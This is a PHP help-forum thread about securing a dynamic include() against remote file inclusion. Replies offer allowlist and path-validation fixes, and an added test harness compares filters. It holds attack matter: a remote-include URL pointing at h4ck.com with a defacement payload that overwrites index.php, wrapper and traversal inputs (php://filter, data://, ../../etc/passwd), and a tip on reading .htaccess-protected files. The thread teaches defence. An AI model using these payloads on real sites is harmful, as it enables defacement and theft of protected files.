
include() security issues?


chokri


www.somewebsite.com/pages.php?page=thisPage <-- how pages are called on my website. 

 

my server's been hacked and i'm trying to figure out whether or not it's been through the website.  i found out include() poses some security issues.  on my webstats, i've noticed a couple of people trying something like:

www.somewebsite.com/pages.php?page=http://gak-pake.com/mail.txt?

 

when clicking on that link, you get the "page not found" message.  based on my code below, would someone be able to run a random php script, thus making my server somehow vulnerable?

 

$pageName = $_REQUEST["page"];
$fileName = $pageName.".php";
$contentFileLoc = fileSearch($fileName,getcwd());  //returns null if $fileName is not found
if($contentFileLoc != null) {include($contentFileLoc);}
else {echo "Page not found.  Please refer to the <a href=pages.php?page=Sitemap>sitemap</a>.  Thank you.";}

 

side note: it was suggested i read: http://www.devshed.com/c/a/PHP/PHP-Security-Mistakes/ for php security tips.  would anyone be able to recommend any other sites?


Yep, I could do something like:

pages.php?page=http://www.h4ck.com/phpinjection

 

The phpinjection.php:

<?php
$entry_line="Ahaha. Hacked by a script kiddy.";
$fp = fopen("index.php", "w"); 
fputs($fp, $entry_line); 
fclose($fp); 
?>

 

 

Hmmm... Seriously, rewrite your code.


The best thing to do would be to use a template system that is not PHP at all and does not require including a file (at least not from GET), or to have a list of the pages, i.e.:

 

<?php
// Allowlist of page names; the request is only ever compared against this list.
$pageArray = array("sitemap", "index", "contact");
$page = 'index'; // default value
if (isset($_GET['page'])) {
     if (in_array($_GET['page'], $pageArray, true)) {
          $page = $_GET['page'];
     }
}

// The extension is appended here, so the request can never name a different kind of file.
include($page . '.php');
?>

 

That way you KNOW what is going to be passed to the include and no one can compromise your page/hack into it like tarun just showed you.


my problem is i have a lot of pages, hence my need for the website to be dynamic.  so my silly question of the day is: could i just write a script to search for all the page names in my directory and then place them into an array, or would i actually have to list them manually?

 

another question..

i've been trying to get my webhost to let me use mod_rewrite.  by making my pages appear static, would that help the website become a wee bit more secure?


www.php.net/dir

 

You can use that to gather file names.

 

mod_rewrite may make it more secure, but with the way you are doing it some script kiddie will find an exploit. You should know what is being included. One thing you could do instead of having the file names is use regular expressions and check for www or http; if that is present, do not allow it to be included. But yeah, you also want to make sure the file exists and that nothing bad is going to happen. You may even want to disable remote include files.

 

www.php.net/include: in there you will find something on how to disallow remote files from being included.

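The question above was whether the list of pages has to be typed by hand. It does not: the directory scan itself can produce the allowlist, as long as the request is then used only as a lookup key and never as part of a path. The following is an added example, not code from this thread or from the original poster's site; it assumes pages.php sits beside a Content/ directory that holds one Name.php per page, and that the default page is called index.

```php
<?php
// Added example, not code from this thread. Scan the content directory once,
// turn what is found into the allowlist, and only ever include paths that came
// out of that scan. Assumed layout: pages.php next to Content/, one Name.php per page.
declare(strict_types=1);

$contentDir = realpath(__DIR__ . '/Content');      // assumption: Content/ beside pages.php
if ($contentDir === false) {
    die('Content directory is missing.');
}

// Walk $baseDir recursively and map "Events" => "/abs/path/Content/sub/Events.php".
function buildPageMap(string $baseDir): array
{
    $map = [];
    $iter = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($baseDir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($iter as $entry) {
        if (!$entry->isFile() || $entry->getExtension() !== 'php') {
            continue;
        }
        $name = $entry->getBasename('.php');
        // Two About.php files in different subdirectories would be ambiguous;
        // keep the first one found rather than picking one per request.
        if (!isset($map[$name])) {
            $map[$name] = $entry->getRealPath();
        }
    }
    return $map;
}

// Look the request up in the map. The user value is a dictionary key, never a
// path fragment, so "http://...", "../", NUL bytes and stream wrappers all just
// miss the lookup and fall through to the "not found" branch.
function resolvePage(array $map, string $baseDir, $requested): ?string
{
    if (!is_string($requested) || $requested === '') {
        $requested = 'index';                       // assumption: default page name
    }
    if (!isset($map[$requested])) {
        return null;
    }
    $path = $map[$requested];
    // Defence in depth: the resolved file must still live under $baseDir.
    $prefix = $baseDir . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// allow_url_include is a system-level ini setting and cannot be turned off from
// a script; this only reports it. Set allow_url_include=Off in php.ini (or the
// server config) so remote includes are impossible whatever the code does.
if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
    error_log('allow_url_include is enabled; remote includes are possible.');
}

$pages  = buildPageMap($contentDir);
$target = resolvePage($pages, $contentDir, $_GET['page'] ?? null);

if ($target !== null) {
    include $target;
} else {
    echo 'Page not found. Please refer to the <a href="pages.php?page=Sitemap">sitemap</a>. Thank you.';
}
```

On a large site the map can be built once and cached (a generated PHP array file or APCu) rather than rescanned on every request; the security property is unchanged either way, because nothing from $_GET ever reaches a filesystem call.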

If someone were to make a text file and you include it from another site, like this: http://gak-pake.com/mail.txt

 

Make sure that file is ONLY read in, not executed.

 

Also, if you only want the files coming from your site and you don't want them to come from anywhere else, use something like this; simple, but it won't allow files from other sites:

 

<?php
// removes any literal "http://" from the requested page name
function isURL($file){
     return preg_replace("~http://~","",$file);
}
$page = isURL($_GET['page']);
?>


I had the same problem; my ISP caught that the person was cross-site scripting and blocked my account to prevent it.

 

I installed the following code to prevent it (I use pagename or inc in various locations on my page):

 

if (//check to ensure no cross-site scripting in page request
     (isset($_GET['pagename']) && preg_match("/http/",$_GET['pagename']) != 0) OR
     (isset($_GET['inc']) && preg_match("/http/",$_GET['inc']) != 0) 
   ) 
{//failed test, send to access denied page
     header ('Location: ' . (my access denied page));
     exit;
}

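The two posts above both filter by looking for the string "http". As an added example (not code from this thread), the script below runs a set of constructed inputs through that kind of check, through the "strip http://" function, and through a positive check that validates the name, builds the path from a fixed directory and confirms the resolved file still lies inside it. The include directory and the sample inputs are assumptions made for the demonstration; only the second sample is taken from the original post's logs.

```php
<?php
// Added example, not code from this thread. Compares a "contains http" check and
// a "strip http://" check against a realpath-based containment check.
// Assumes includable pages live under $includeDir as Name.php.
declare(strict_types=1);

$includeDir = realpath(__DIR__ . '/includes') ?: __DIR__;   // assumption

// Constructed inputs; the second is the one seen in the original post's logs.
$samples = [
    'contact',                                              // legitimate page name
    'http://gak-pake.com/mail.txt',
    'HTTP://gak-pake.com/mail.txt',                         // both checks below are case-sensitive; PHP's scheme lookup is not
    'ftp://gak-pake.com/mail.txt',                          // no "http" anywhere in it
    'php://filter/convert.base64-encode/resource=config',   // local wrapper, works even with allow_url_include=Off
    'data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8+',    // inline "<?php phpinfo();?>", needs allow_url_include=On
    '../../../../etc/passwd',                               // traversal, no scheme at all
];

// The check from the post above: flag anything containing "http".
function containsHttp(string $s): bool
{
    return preg_match('/http/', $s) === 1;
}

// The other check from above: strip a literal "http://" and use what is left.
function stripHttp(string $s): string
{
    return preg_replace('~http://~', '', $s);
}

// Positive check: restrict the name to a safe character class, build the path
// from a fixed directory, resolve it, and confirm it is still in that directory.
function safeIncludePath(string $baseDir, string $page): ?string
{
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $page)) {
        return null;                           // rejects schemes, slashes, dots, NUL bytes
    }
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . $page . '.php');
    if ($real === false) {
        return null;                           // file does not exist (realpath knows no wrappers)
    }
    $prefix = $baseDir . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : null;
}

printf("%-54s %-9s %-46s %s\n", 'input', 'has-http', 'after strip (what gets included)', 'realpath check');
foreach ($samples as $s) {
    printf(
        "%-54s %-9s %-46s %s\n",
        $s,
        containsHttp($s) ? 'blocked' : 'PASSES',
        stripHttp($s),
        safeIncludePath($includeDir, $s) ?? 'rejected'
    );
}
```

Every input except the first reaches include() under at least one of the two string checks, while only a name that actually exists as a .php file under the include directory survives the positive check. That is the practical difference between a denylist of bad substrings and an allowlist of what is permitted.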

Something like this would do:

 

<?php
// Map each allowed "act" value to the module file that serves it.
$modules = array(
	'home'          => 'home',
	'login'         => 'login',
	'register'      => 'login',
	'lost_password' => 'login',
	'member_list'   => 'members',
);

$module = empty($_GET['act']) ? 'home' : $_GET['act'];

// Look the request up as a key; the file name comes from the map, never from the request.
$module_path = (is_string($module) && isset($modules[$module]))
	? "/var/www/modules/{$modules[$module]}.module.php"
	: null;

if($module_path !== null && file_exists($module_path))
{
	require_once $module_path;
}
else {
	// Do not echo the raw request back into the page.
	die("Could not load module.");
}
?>


okay, please bear with me.. i'm trying to understand when the text file would get executed.  would it be in the include function? 

 

if that were the case, then i don't see how that is possible in my original code.

example 1: pages.php?page=http://gak-pake.com/mail.txt

my fileSearch() goes through a specific directory (and its subdirectories) looking for http://gak-pake.com/mail.txt.php.  fileSearch() returns null since http://gak-pake.com/mail.txt.php is not found in my directory.  since it's null, then include() is not even used.

 

example 2: pages.php?page=Events

my fileSearch() goes through a specific directory (and its subdirectories) looking for Events.php.  fileSearch() returns the location of Events.php since the file is located in one of my subdirectories.  in this case, include($contentFileLocation) is executed.

 

i just assumed that would be a safeguard..

 

anyway, thank you so much for your help!!  i'm a newbie to php, and just followed the manual to create my code, so my experience is very, very limited.


example: fileSearch("Events.php","/home/someWebsite/public_html/Content/")

 

function fileSearch($target,$curdirLoc)
{
   $fileFound = false;
   $compfileLoc = null;
   $curDir = scandir($curdirLoc);
   
   foreach($curDir as $curEntry)
   {
      if($curEntry != "." && $curEntry != "..")
      {
         $myLoc = $curdirLoc."/".$curEntry;
         if(is_file($myLoc))
         {
            // compares the entry name minus its first two characters against $target
            if(strcmp(substr($curEntry,2),$target) == 0)
            {
               $fileFound = true;
               return $myLoc;
            }
         }
         elseif(is_dir($myLoc))
         {
            $compfileLoc=fileSearch($target,$myLoc);
            if($compfileLoc !== null){return $compfileLoc;}
         }
      }
   }
   if(!$fileFound) {return null;}
}


I would just do something very simple that doesn't require you to build an array of file names as that could become burdensome if the amount of files ever got huge.

 

<?php
$file = isset($_GET['file']) ? $_GET['file'] : '';
if(get_magic_quotes_gpc()) {
$file = stripslashes($file);
}

$includedirectory = "path/to/your/include/folder/";
$notfoundpage = "some/place/to/show/a/message/if/the/file/is/invalid/or/not/found.php";
// Reject anything containing a path separator: no subdirectories, no "../", no "http://".
$a = array("\\", "/");
$file2 = str_replace($a, "", $file);
if($file == $file2 && file_exists($includedirectory.$file)) {
include($includedirectory.$file);
}
else {
include($notfoundpage);
}

?>


Why not just use one of the options people have posted?

 

like i posted earlier, the page count for my website is high; manually creating an array of page names is not an option.

 

my question today basically was: does my code not inadvertently do that anyway?  because in order for a file to be read, it would have to be located in one of my directories.  or did i miss something in my code that allows that whole step to be bypassed?


hmm... I was doing the same exact thing. [site]/index.php?show=[pagename]

 

I tried telling it to include a page from another site of mine, but it wouldn't show any of the text in there.

 

 

 

Another thing to note is that if you have any .htaccess password-protected areas, you can be smart with the includes and include files inside the .htaccess-protected directory without logging in. And it's simple to find out what the .htaccess directory is... almost certainly it's one of the ones listed in the robots.txt file they'll have.

 

Just for the noobs among us who don't know too much.

